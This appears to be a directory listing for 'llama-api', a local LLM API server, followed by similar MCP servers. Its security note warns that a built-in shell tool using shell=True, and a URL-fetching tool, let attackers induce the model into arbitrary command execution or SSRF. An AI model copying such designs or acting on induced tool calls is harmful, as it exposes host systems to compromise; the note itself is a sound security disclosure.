llama-api
by MuscleGear5
Overview
A local LLM API server for chat completions, tool calling, vision, embeddings, and audio transcription, integrated with developer tools.
Installation
docker-compose -f docker-compose.prod.yml up -dSecurity Notes
The project includes a built-in tool, `run_shell_command`, which uses `subprocess.run(command, shell=True)`. This is a critical security vulnerability as it allows for arbitrary shell command execution if an attacker can induce the LLM to call it or directly exploit an API endpoint that invokes tools. While intended for developer use, exposing such a capability, especially with `shell=True`, poses a significant risk for sandbox escapes and system compromise. Additionally, the `test_endpoint` MCP tool can make HTTP requests to arbitrary URLs, which could be abused for SSRF if not properly secured.
Similar Servers
zeromcp
A minimal, pure Python Model Context Protocol (MCP) server for exposing tools, resources, and prompts via HTTP/SSE and Stdio transports.
MCP-buddy
A local desktop or web application to manage and interact with multiple MCP (Model Context Protocol) servers, offering optional AI orchestration and enhancement for responses.
atlantis-mcp-server
An MCP (Model Context Protocol) server for hosting and managing dynamic Python functions and third-party MCP tools, enabling AI agents to discover and utilize shared capabilities across a network.
mcp-server-llmling
mcp-server-llmling serves as a Machine Chat Protocol (MCP) server, providing a YAML-based system to configure and manage LLM applications, including resources, prompts, and tools.